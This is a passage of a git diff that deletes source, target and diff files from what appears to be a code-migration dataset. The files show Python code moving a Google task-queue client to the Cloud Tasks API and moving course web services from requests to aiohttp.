-+ -+ s = session or self.session -+ resp = await s.delete(url, headers=await self.headers()) -+ resp.raise_for_status() -+ return await resp.json() -+ -+ async def drain(self): -+ resp = await self.lease(num_tasks=1000) -+ while resp: -+ await asyncio.wait([self.delete(t['name']) for t in resp['tasks']]) -+ resp = await self.lease(num_tasks=1000) -+ -+ # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/get -+ async def get(self, tname, full=False, session=None): -+ url = '{}/{}'.format(API_ROOT, tname) - params = { -- 'alt': 'json', -- 'leaseSecs': lease_seconds, -- 'numTasks': num_tasks -+ 'responseView': 'FULL' if full else 'BASIC', - } - -- if tag: -- params.update({ -- 'groupByTag': 'true', -- 'tag': tag -- }) -- -- status, content = await post( -- url, -- headers={'Authorization': 'Bearer {}'.format(token)}, -- params=params, -- session=session -- ) -- -- if status < 200 or status >= 300: -- -- raise Exception('Could not lease a task from {} -> {}: {}'.format( -- self.task_queue, -- status, -- content -- )) -- -- items = content.get('items', []) -- -- return items[:num_tasks] -- -- async def renew_task(self, id_, lease_seconds=60, session=None): -- -- """ -- extend a task lease on the task queue -- """ -- -- session = session or self.session -- -- token = await self.token.get() -- -- url = '{}/{}'.format(self.url, id_) -- -- body = make_renew_body(self.task_queue, id_) -- -- status, phrase = await patch( -- url, -- payload=body, -- params={'alt': 'json', 'newLeaseSeconds': lease_seconds}, -- headers={'Authorization': 'Bearer {}'.format(token)}, -- session=session -- ) -- -- was_renewed = status == 200 -- -- if not was_renewed: -- log.error('Could not renew task %s in %s: %s', id_, -- self.task_queue, phrase) -- -- return was_renewed -- -- --class LocalTaskQueue(object): -- """ -- An asynchronous in-memory Task Queue -- """ -- # pylint: disable=too-many-instance-attributes -- def __init__(self, *args, **kwargs): # pylint: disable=unused-argument -- self.queue = asyncio.Queue() -- self.deleted = {} -- self.leased = {} -- self.ready = {} -- -- self.duration = 0 -- self.start_time = None -- -- self.on_empty = kwargs.get('on_empty') -- self.task_queue = kwargs.get('task_queue', 'q:{}'.format( -- self.next_id())) -- -- @classmethod -- def next_id(cls, name='tqid'): -- -- name = '_id_{}'.format(name) -- val = getattr(cls, name, 0) + 1 -- setattr(cls, name, val) -- -- return val -- -- @staticmethod -- def make_task(payload, retry_count=0): -- -- task = { -- 'id': LocalTaskQueue.next_id('tid'), -- 'retry_count': retry_count, -- 'payloadBase64': encode(json.dumps(payload).encode('utf-8')) -+ s = session or self.session -+ resp = await s.get(url, params=params, headers=await self.headers()) -+ resp.raise_for_status() -+ return await resp.json() -+ -+ # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/create -+ async def insert(self, payload, tag=None, session=None): -+ url = '{}/tasks'.format(self.api_root) -+ body = { -+ 'task': { -+ 'pullMessage': { -+ 'payload': payload, -+ 'tag': tag, -+ }, -+ }, -+ 'responseView': 'FULL', - } - -- return task -- -- async def _make_ready(self, task, bump=False): -- -- if bump: -- task['retry_count'] = task.get('retry_count', 0) + 1 -- -- self.ready[task['id']] = task -- -- await self.queue.put(task) -- -- async def _unlease(self, task): -- -- if task['id'] not in self.leased: -- return -- -- del self.leased[task['id']] -- -- await self._make_ready(task, bump=True) -- -- async def get_stats(self): -- -- return { -- 'qsize': self.queue.qsize(), -- 'ready': len(self.ready), -- 'leased': len(self.leased), -- 'deleted': len(self.deleted) -+ s = session or self.session -+ resp = await s.post(url, json=body, headers=await self.headers()) -+ resp.raise_for_status() -+ return await resp.json() -+ -+ # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/lease -+ async def lease(self, num_tasks=1, lease_seconds=60, task_filter=None, -+ session=None): -+ url = '{}/tasks:lease'.format(self.api_root) -+ body = { -+ 'maxTasks': min(num_tasks, 1000), -+ 'leaseDuration': '{}s'.format(lease_seconds), -+ 'responseView': 'FULL', -+ } -+ if task_filter: -+ body['filter'] = task_filter -+ -+ s = session or self.session -+ resp = await s.post(url, json=body, headers=await self.headers()) -+ resp.raise_for_status() -+ return await resp.json() -+ -+ # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/list -+ async def list(self, full=False, page_size=1000, page_token='', -+ session=None): -+ url = '{}/tasks'.format(self.api_root) -+ params = { -+ 'responseView': 'FULL' if full else 'BASIC', -+ 'pageSize': page_size, -+ 'pageToken': page_token, - } - -- async def insert_task(self, payload): -- -- task = LocalTaskQueue.make_task(payload) -- -- await self._make_ready(task) -- -- log.info('Inserted task.') -- -- async def delete_task(self, id_): -- -- if id_ in self.leased: -- del self.leased[id_] -- -- if id_ in self.ready: -- task = self.ready[id_] -- del self.ready[id_] -- self.deleted[id_] = task -- -- if self.on_empty: -- if not self.ready and not self.leased and not self.queue.qsize(): -- if self.start_time: -- self.duration = time.perf_counter() - self.start_time -- -- self.on_empty() -- return -- -- await asyncio.sleep(0) -- -- async def lease_task(self, lease_seconds=60, num_tasks=1): -- -- await asyncio.sleep(0) -- -- tasks = [] -- -- while len(tasks) < num_tasks: -- -- try: -- task = self.queue.get_nowait() -- except asyncio.QueueEmpty: -- break -- -- if not self.start_time: -- self.start_time = time.perf_counter() -- -- if task['id'] in self.deleted: -- del self.deleted[task['id']] -- continue -- -- del self.ready[task['id']] -- -- self.leased[task['id']] = ( -- call_later( -- lease_seconds, -- self._unlease, -- task -- ), -- task -- ) -- -- tasks.append(task) -- -- return tasks -- -- async def renew_task(self, id_, lease_seconds=60): -- -- if id_ not in self.leased: -- return False -- -- asyncio_task, task = self.leased[id_] -- asyncio_task.cancel() -- -- self.leased[id_] = ( -- call_later( -- lease_seconds, -- self._unlease, -- task -- ), -- task -- ) -+ s = session or self.session -+ resp = await s.get(url, params=params, headers=await self.headers()) -+ resp.raise_for_status() -+ return await resp.json() -+ -+ # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/renewLease -+ async def renew(self, task, lease_seconds=60, session=None): -+ url = '{}/{}:renewLease'.format(API_ROOT, task['name']) -+ body = { -+ 'scheduleTime': task['scheduleTime'], -+ 'leaseDuration': '{}s'.format(lease_seconds), -+ 'responseView': 'FULL', -+ } - -- return True -+ s = session or self.session -+ resp = await s.post(url, json=body, headers=await self.headers()) -+ resp.raise_for_status() -+ return await resp.json() diff --git a/v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.source.py b/v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.source.py deleted file mode 100644 index 05b3ee4..0000000 --- a/v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.source.py +++ /dev/null @@ -1,376 +0,0 @@ -""" -An asynchronous queue for Google Appengine Task Queues -""" -import asyncio -import datetime -import json -import logging -import time - -import ujson -from gcloud.aio.auth import Token -from gcloud.aio.core.aio import call_later -from gcloud.aio.core.http import delete -from gcloud.aio.core.http import get -from gcloud.aio.core.http import HttpError -from gcloud.aio.core.http import patch -from gcloud.aio.core.http import post -from gcloud.aio.taskqueue.utils import encode - - -API_ROOT = 'https://www.googleapis.com/taskqueue/v1beta2/projects' -SCOPES = [ - 'https://www.googleapis.com/auth/taskqueue', - 'https://www.googleapis.com/auth/taskqueue.consumer', - 'https://www.googleapis.com/auth/cloud-taskqueue', - 'https://www.googleapis.com/auth/cloud-taskqueue.consumer', -] -TASK_QUEUE_URL = '{api_root}/s~{project_name}/taskqueues/{queue_name}/tasks' - -log = logging.getLogger(__name__) - - -def make_insert_body(queue_name: str, payload: dict): - - delta = datetime.datetime.now() - datetime.datetime(1970, 1, 1) - micro_sec_since_epock = int(delta.total_seconds() * 1000000) - encoded_payload = encode(ujson.dumps(payload)) - - return { - 'kind': 'taskqueues#task', - 'queueName': queue_name, - 'payloadBase64': encoded_payload, - 'enqueueTimestamp': micro_sec_since_epock, - 'leaseTimestamp': 0, - 'retry_count': 0 - } - - -def make_renew_body(queue_name: str, id_: str): - - return { - 'kind': 'taskqueues#task', - 'id': id_, - 'queueName': queue_name - } - - -class TaskQueue(object): - - """ - An asynchronous Google Task Queue - """ - - def __init__(self, project, service_file, task_queue, session=None, - token=None): - # pylint: disable=too-many-arguments - - self.task_queue = task_queue - self.service_file = service_file - self.session = session - self.token = token or Token( - project, - self.service_file, - session=self.session, - scopes=SCOPES - ) - self.url = TASK_QUEUE_URL.format( - api_root=API_ROOT, - project_name=project, - queue_name=task_queue - ) - - async def insert_task(self, payload, tag='', session=None): - - session = session or self.session - - if tag: - payload['tag'] = tag - - body = make_insert_body(self.task_queue, payload) - - token = await self.token.get() - - status, content = await post( - self.url, - payload=body, - session=session, - headers={ - 'Authorization': 'Bearer {}'.format(token) - } - ) - - success = status >= 200 and status < 300 - - if not success: - log.error('Could not insert task into %s: %s', self.task_queue, - content) - - return success - - async def get_stats(self, session=None): - - """ - get the task queue statistics - """ - - session = session or self.session - - token = await self.token.get() - - status, content = await get( - '/'.join(self.url.split('/')[:-1]), - params={'getStats': 'true'}, - headers={'Authorization': 'Bearer {}'.format(token)}, - session=session - ) - - if 200 <= status < 300: - return content - - raise HttpError('Could not get stats for {} -> {}: {}'.format( - self.task_queue, - status, - content - )) - - async def delete_task(self, id_, session=None): - - session = session or self.session - - token = await self.token.get() - - url = '{}/{}'.format(self.url, id_) - - status, phrase = await delete( - url, - headers={'Authorization': 'Bearer {}'.format(token)}, - session=session - ) - - if 200 <= status < 300: - return True - - log.error('Error deleting task %s -> %s: %s', id_, status, phrase) - - async def lease_task(self, lease_seconds=60, num_tasks=1, tag=None, - session=None): - - """ - lease a task or tasks from the task queue - """ - - session = session or self.session - - token = await self.token.get() - - url = '{}/{}'.format(self.url, 'lease') - - params = { - 'alt': 'json', - 'leaseSecs': lease_seconds, - 'numTasks': num_tasks - } - - if tag: - params.update({ - 'groupByTag': 'true', - 'tag': tag - }) - - status, content = await post( - url, - headers={'Authorization': 'Bearer {}'.format(token)}, - params=params, - session=session - ) - - if status < 200 or status >= 300: - - raise Exception('Could not lease a task from {} -> {}: {}'.format( - self.task_queue, - status, - content - )) - - items = content.get('items', []) - - return items[:num_tasks] - - async def renew_task(self, id_, lease_seconds=60, session=None): - - """ - extend a task lease on the task queue - """ - - session = session or self.session - - token = await self.token.get() - - url = '{}/{}'.format(self.url, id_) - - body = make_renew_body(self.task_queue, id_) - - status, phrase = await patch( - url, - payload=body, - params={'alt': 'json', 'newLeaseSeconds': lease_seconds}, - headers={'Authorization': 'Bearer {}'.format(token)}, - session=session - ) - - was_renewed = status == 200 - - if not was_renewed: - log.error('Could not renew task %s in %s: %s', id_, - self.task_queue, phrase) - - return was_renewed - - -class LocalTaskQueue(object): - """ - An asynchronous in-memory Task Queue - """ - # pylint: disable=too-many-instance-attributes - def __init__(self, *args, **kwargs): # pylint: disable=unused-argument - self.queue = asyncio.Queue() - self.deleted = {} - self.leased = {} - self.ready = {} - - self.duration = 0 - self.start_time = None - - self.on_empty = kwargs.get('on_empty') - self.task_queue = kwargs.get('task_queue', 'q:{}'.format( - self.next_id())) - - @classmethod - def next_id(cls, name='tqid'): - - name = '_id_{}'.format(name) - val = getattr(cls, name, 0) + 1 - setattr(cls, name, val) - - return val - - @staticmethod - def make_task(payload, retry_count=0): - - task = { - 'id': LocalTaskQueue.next_id('tid'), - 'retry_count': retry_count, - 'payloadBase64': encode(json.dumps(payload).encode('utf-8')) - } - - return task - - async def _make_ready(self, task, bump=False): - - if bump: - task['retry_count'] = task.get('retry_count', 0) + 1 - - self.ready[task['id']] = task - - await self.queue.put(task) - - async def _unlease(self, task): - - if task['id'] not in self.leased: - return - - del self.leased[task['id']] - - await self._make_ready(task, bump=True) - - async def get_stats(self): - - return { - 'qsize': self.queue.qsize(), - 'ready': len(self.ready), - 'leased': len(self.leased), - 'deleted': len(self.deleted) - } - - async def insert_task(self, payload): - - task = LocalTaskQueue.make_task(payload) - - await self._make_ready(task) - - log.info('Inserted task.') - - async def delete_task(self, id_): - - if id_ in self.leased: - del self.leased[id_] - - if id_ in self.ready: - task = self.ready[id_] - del self.ready[id_] - self.deleted[id_] = task - - if self.on_empty: - if not self.ready and not self.leased and not self.queue.qsize(): - if self.start_time: - self.duration = time.perf_counter() - self.start_time - - self.on_empty() - return - - await asyncio.sleep(0) - - async def lease_task(self, lease_seconds=60, num_tasks=1): - - await asyncio.sleep(0) - - tasks = [] - - while len(tasks) < num_tasks: - - try: - task = self.queue.get_nowait() - except asyncio.QueueEmpty: - break - - if not self.start_time: - self.start_time = time.perf_counter() - - if task['id'] in self.deleted: - del self.deleted[task['id']] - continue - - del self.ready[task['id']] - - self.leased[task['id']] = ( - call_later( - lease_seconds, - self._unlease, - task - ), - task - ) - - tasks.append(task) - - return tasks - - async def renew_task(self, id_, lease_seconds=60): - - if id_ not in self.leased: - return False - - asyncio_task, task = self.leased[id_] - asyncio_task.cancel() - - self.leased[id_] = ( - call_later( - lease_seconds, - self._unlease, - task - ), - task - ) - - return True diff --git a/v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.target.py b/v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.target.py deleted file mode 100644 index 733015d..0000000 --- a/v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.target.py +++ /dev/null @@ -1,149 +0,0 @@ -""" -An asynchronous queue for Google Appengine Task Queues -""" -import asyncio - -import aiohttp -from gcloud.aio.auth import Token - - -API_ROOT = 'https://cloudtasks.googleapis.com/v2beta2' -LOCATION = 'us-central1' -SCOPES = [ - 'https://www.googleapis.com/auth/cloud-tasks', -] - - -class TaskQueue: - def __init__(self, project, service_file, taskqueue, location=LOCATION, - session=None, token=None): - # pylint: disable=too-many-arguments - self.session = session or aiohttp.ClientSession() - - self.api_root = '{}/projects/{}/locations/{}/queues/{}'.format( - API_ROOT, project, location, taskqueue) - - self.token = token or Token(project, service_file, scopes=SCOPES, - session=self.session) - - async def headers(self): - return { - 'Authorization': 'Bearer {}'.format(await self.token.get()), - 'Content-Type': 'application/json', - } - - # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/acknowledge - async def ack(self, task, session=None): - url = '{}/{}:acknowledge'.format(API_ROOT, task['name']) - body = { - 'scheduleTime': task['scheduleTime'], - } - - s = session or self.session - resp = await s.post(url, json=body, headers=await self.headers()) - resp.raise_for_status() - return await resp.json() - - # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/cancelLease - async def cancel(self, task, session=None): - url = '{}/{}:cancelLease'.format(API_ROOT, task['name']) - body = { - 'scheduleTime': task['scheduleTime'], - 'responseView': 'BASIC', - } - - s = session or self.session - resp = await s.post(url, json=body, headers=await self.headers()) - resp.raise_for_status() - return await resp.json() - - # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/delete - async def delete(self, tname, session=None): - url = '{}/{}'.format(API_ROOT, tname) - - s = session or self.session - resp = await s.delete(url, headers=await self.headers()) - resp.raise_for_status() - return await resp.json() - - async def drain(self): - resp = await self.lease(num_tasks=1000) - while resp: - await asyncio.wait([self.delete(t['name']) for t in resp['tasks']]) - resp = await self.lease(num_tasks=1000) - - # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/get - async def get(self, tname, full=False, session=None): - url = '{}/{}'.format(API_ROOT, tname) - params = { - 'responseView': 'FULL' if full else 'BASIC', - } - - s = session or self.session - resp = await s.get(url, params=params, headers=await self.headers()) - resp.raise_for_status() - return await resp.json() - - # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/create - async def insert(self, payload, tag=None, session=None): - url = '{}/tasks'.format(self.api_root) - body = { - 'task': { - 'pullMessage': { - 'payload': payload, - 'tag': tag, - }, - }, - 'responseView': 'FULL', - } - - s = session or self.session - resp = await s.post(url, json=body, headers=await self.headers()) - resp.raise_for_status() - return await resp.json() - - # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/lease - async def lease(self, num_tasks=1, lease_seconds=60, task_filter=None, - session=None): - url = '{}/tasks:lease'.format(self.api_root) - body = { - 'maxTasks': min(num_tasks, 1000), - 'leaseDuration': '{}s'.format(lease_seconds), - 'responseView': 'FULL', - } - if task_filter: - body['filter'] = task_filter - - s = session or self.session - resp = await s.post(url, json=body, headers=await self.headers()) - resp.raise_for_status() - return await resp.json() - - # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/list - async def list(self, full=False, page_size=1000, page_token='', - session=None): - url = '{}/tasks'.format(self.api_root) - params = { - 'responseView': 'FULL' if full else 'BASIC', - 'pageSize': page_size, - 'pageToken': page_token, - } - - s = session or self.session - resp = await s.get(url, params=params, headers=await self.headers()) - resp.raise_for_status() - return await resp.json() - - # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/renewLease - async def renew(self, task, lease_seconds=60, session=None): - url = '{}/{}:renewLease'.format(API_ROOT, task['name']) - body = { - 'scheduleTime': task['scheduleTime'], - 'leaseDuration': '{}s'.format(lease_seconds), - 'responseView': 'FULL', - } - - s = session or self.session - resp = await s.post(url, json=body, headers=await self.headers()) - resp.raise_for_status() - return await resp.json() diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.diff b/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.diff deleted file mode 100644 index 5efa8c8..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.diff +++ /dev/null @@ -1,38 +0,0 @@ -diff --git a/src/10-async-web/acityscape_api/services/location_service.py b/src/10-async-web/acityscape_api/services/location_service.py - index aa607bd32a90d7693e91bd4a1be39baec2d889ba..a5c04bbd9b5614a8fc0317050c01e4c241b1b41d 100644 - --- a/src/10-async-web/acityscape_api/services/location_service.py - +++ b/src/10-async-web/acityscape_api/services/location_service.py -@@ -1,7 +1,8 @@ - import random - import time - from typing import Tuple --import requests -+ -+import aiohttp - - use_cached_data = False - -@@ -10,7 +11,7 @@ measured_latency_in_sec = [ - 0.535646, 0.527148, 0.533472, 0.53351, 0.523462] - - --def get_lat_long(zip_code: str, country: str) -> Tuple[float, float]: -+async def get_lat_long(zip_code: str, country: str) -> Tuple[float, float]: - key = f'{zip_code}, {country}' - url = f'http://www.datasciencetoolkit.org/street2coordinates/{key.replace(" ", "+")}' - -@@ -18,10 +19,11 @@ def get_lat_long(zip_code: str, country: str) -> Tuple[float, float]: - time.sleep(random.choice(measured_latency_in_sec)) - return 45.50655, -122.733888 - else: -- resp = requests.get(url) -- resp.raise_for_status() -+ async with aiohttp.ClientSession() as session: -+ async with session.get(url) as resp: -+ resp.raise_for_status() - -- data = resp.json() -+ data = await resp.json() - - city_data = data.get(f'{zip_code}, {country}', dict()) - return city_data.get('latitude', 0.00), city_data.get('longitude', 0.00) diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.source.py b/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.source.py deleted file mode 100644 index 3797bb1..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.source.py +++ /dev/null @@ -1,27 +0,0 @@ -import random -import time -from typing import Tuple -import requests - -use_cached_data = False - -measured_latency_in_sec = [ - 0.28844, 0.334694, 0.33468, 0.343911, 0.339515, 0.344329, 0.341594, 0.352366, - 0.535646, 0.527148, 0.533472, 0.53351, 0.523462] - - -def get_lat_long(zip_code: str, country: str) -> Tuple[float, float]: - key = f'{zip_code}, {country}' - url = f'http://www.datasciencetoolkit.org/street2coordinates/{key.replace(" ", "+")}' - - if use_cached_data: - time.sleep(random.choice(measured_latency_in_sec)) - return 45.50655, -122.733888 - else: - resp = requests.get(url) - resp.raise_for_status() - - data = resp.json() - - city_data = data.get(f'{zip_code}, {country}', dict()) - return city_data.get('latitude', 0.00), city_data.get('longitude', 0.00) diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.target.py b/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.target.py deleted file mode 100644 index aaff903..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.target.py +++ /dev/null @@ -1,29 +0,0 @@ -import random -import time -from typing import Tuple - -import aiohttp - -use_cached_data = False - -measured_latency_in_sec = [ - 0.28844, 0.334694, 0.33468, 0.343911, 0.339515, 0.344329, 0.341594, 0.352366, - 0.535646, 0.527148, 0.533472, 0.53351, 0.523462] - - -async def get_lat_long(zip_code: str, country: str) -> Tuple[float, float]: - key = f'{zip_code}, {country}' - url = f'http://www.datasciencetoolkit.org/street2coordinates/{key.replace(" ", "+")}' - - if use_cached_data: - time.sleep(random.choice(measured_latency_in_sec)) - return 45.50655, -122.733888 - else: - async with aiohttp.ClientSession() as session: - async with session.get(url) as resp: - resp.raise_for_status() - - data = await resp.json() - - city_data = data.get(f'{zip_code}, {country}', dict()) - return city_data.get('latitude', 0.00), city_data.get('longitude', 0.00) diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.diff b/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.diff deleted file mode 100644 index 9bd6ac4..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.diff +++ /dev/null @@ -1,36 +0,0 @@ -diff --git a/src/10-async-web/acityscape_api/services/sun_service.py b/src/10-async-web/acityscape_api/services/sun_service.py - index aa607bd32a90d7693e91bd4a1be39baec2d889ba..a5c04bbd9b5614a8fc0317050c01e4c241b1b41d 100644 - --- a/src/10-async-web/acityscape_api/services/sun_service.py - +++ b/src/10-async-web/acityscape_api/services/sun_service.py -@@ -2,13 +2,13 @@ import datetime - import random - import time - --import requests -+import aiohttp - - measured_latency_in_sec = [0.399203, 0.7046, 0.422959, 0.741911, 0.404674] - use_cached_data = False - - --def for_today(latitude: float, longitude: float) -> dict: -+async def for_today(latitude: float, longitude: float) -> dict: - url = f'https://api.sunrise-sunset.org/json?lat={latitude}&lng={longitude}' - - if use_cached_data: # Set in config/dev.json or config/prod.json -@@ -18,10 +18,12 @@ def for_today(latitude: float, longitude: float) -> dict: - 'nautical_twilight_begin': '04:49:54 AM', 'nautical_twilight_end': '09:43:03 PM', - 'astronomical_twilight_begin': '04:03:13 AM', 'astronomical_twilight_end': '10:29:44 PM'} - else: -- resp = requests.get(url) -- resp.raise_for_status() -+ async with aiohttp.ClientSession() as session: -+ async with session.get(url) as resp: -+ -+ data = await resp.json() -+ sun_data = data.get('results', {}) - -- sun_data = resp.json().get('results', {}) - for k, v in list(sun_data.items()): - if 'AM' not in v and 'PM' not in v: - continue diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.source.py b/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.source.py deleted file mode 100644 index acf875e..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.source.py +++ /dev/null @@ -1,39 +0,0 @@ -import datetime -import random -import time - -import requests - -measured_latency_in_sec = [0.399203, 0.7046, 0.422959, 0.741911, 0.404674] -use_cached_data = False - - -def for_today(latitude: float, longitude: float) -> dict: - url = f'https://api.sunrise-sunset.org/json?lat={latitude}&lng={longitude}' - - if use_cached_data: # Set in config/dev.json or config/prod.json - time.sleep(random.choice(measured_latency_in_sec)) - return {'sunrise': '06:04:09 AM', 'sunset': '08:28:48 PM', 'solar_noon': '01:16:28 PM', - 'day_length': '14:24:39', 'civil_twilight_begin': '05:31:10 AM', 'civil_twilight_end': '09:01:47 PM', - 'nautical_twilight_begin': '04:49:54 AM', 'nautical_twilight_end': '09:43:03 PM', - 'astronomical_twilight_begin': '04:03:13 AM', 'astronomical_twilight_end': '10:29:44 PM'} - else: - resp = requests.get(url) - resp.raise_for_status() - - sun_data = resp.json().get('results', {}) - for k, v in list(sun_data.items()): - if 'AM' not in v and 'PM' not in v: - continue - - sun_data[k] = datetime.datetime.strftime(__utc_to_local(v), '%I:%M:%S %p') - - return sun_data - - -def __utc_to_local(date_text: str) -> datetime.datetime: - # Not perfect, but works most of the time. - utc = datetime.datetime.strptime(date_text, '%I:%M:%S %p') - now_timestamp = time.time() - offset = datetime.datetime.fromtimestamp(now_timestamp) - datetime.datetime.utcfromtimestamp(now_timestamp) - return utc + offset diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.target.py b/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.target.py deleted file mode 100644 index d1b4ab2..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.target.py +++ /dev/null @@ -1,41 +0,0 @@ -import datetime -import random -import time - -import aiohttp - -measured_latency_in_sec = [0.399203, 0.7046, 0.422959, 0.741911, 0.404674] -use_cached_data = False - - -async def for_today(latitude: float, longitude: float) -> dict: - url = f'https://api.sunrise-sunset.org/json?lat={latitude}&lng={longitude}' - - if use_cached_data: # Set in config/dev.json or config/prod.json - time.sleep(random.choice(measured_latency_in_sec)) - return {'sunrise': '06:04:09 AM', 'sunset': '08:28:48 PM', 'solar_noon': '01:16:28 PM', - 'day_length': '14:24:39', 'civil_twilight_begin': '05:31:10 AM', 'civil_twilight_end': '09:01:47 PM', - 'nautical_twilight_begin': '04:49:54 AM', 'nautical_twilight_end': '09:43:03 PM', - 'astronomical_twilight_begin': '04:03:13 AM', 'astronomical_twilight_end': '10:29:44 PM'} - else: - async with aiohttp.ClientSession() as session: - async with session.get(url) as resp: - - data = await resp.json() - sun_data = data.get('results', {}) - - for k, v in list(sun_data.items()): - if 'AM' not in v and 'PM' not in v: - continue - - sun_data[k] = datetime.datetime.strftime(__utc_to_local(v), '%I:%M:%S %p') - - return sun_data - - -def __utc_to_local(date_text: str) -> datetime.datetime: - # Not perfect, but works most of the time. - utc = datetime.datetime.strptime(date_text, '%I:%M:%S %p') - now_timestamp = time.time() - offset = datetime.datetime.fromtimestamp(now_timestamp) - datetime.datetime.utcfromtimestamp(now_timestamp) - return utc + offset diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.diff b/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.diff deleted file mode 100644 index 475487b..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.diff +++ /dev/null @@ -1,25 +0,0 @@ -diff --git a/src/10-async-web/acityscape_api/services/weather_service.py b/src/10-async-web/acityscape_api/services/weather_service.py - index aa607bd32a90d7693e91bd4a1be39baec2d889ba..a5c04bbd9b5614a8fc0317050c01e4c241b1b41d 100644 - --- a/src/10-async-web/acityscape_api/services/weather_service.py - +++ b/src/10-async-web/acityscape_api/services/weather_service.py -@@ -1,4 +1,4 @@ --import requests -+import aiohttp - - __api_key = '' - -@@ -8,9 +8,10 @@ def global_init(api_key: str): - __api_key = api_key - - --def get_current(zip_code: str, country_code: str) -> dict: -+async def get_current(zip_code: str, country_code: str) -> dict: - url = f'https://api.openweathermap.org/data/2.5/weather?zip={zip_code},{country_code}&appid={__api_key}' -- resp = requests.get(url) -- resp.raise_for_status() -+ async with aiohttp.ClientSession() as session: -+ async with session.get(url) as resp: -+ resp.raise_for_status() - -- return resp.json() -+ return await resp.json() diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.source.py b/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.source.py deleted file mode 100644 index b4f8c39..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.source.py +++ /dev/null @@ -1,16 +0,0 @@ -import requests - -__api_key = '' - - -def global_init(api_key: str): - global __api_key - __api_key = api_key - - -def get_current(zip_code: str, country_code: str) -> dict: - url = f'https://api.openweathermap.org/data/2.5/weather?zip={zip_code},{country_code}&appid={__api_key}' - resp = requests.get(url) - resp.raise_for_status() - - return resp.json() diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.target.py b/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.target.py deleted file mode 100644 index 24528d2..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.target.py +++ /dev/null @@ -1,17 +0,0 @@ -import aiohttp - -__api_key = '' - - -def global_init(api_key: str): - global __api_key - __api_key = api_key - - -async def get_current(zip_code: str, country_code: str) -> dict: - url = 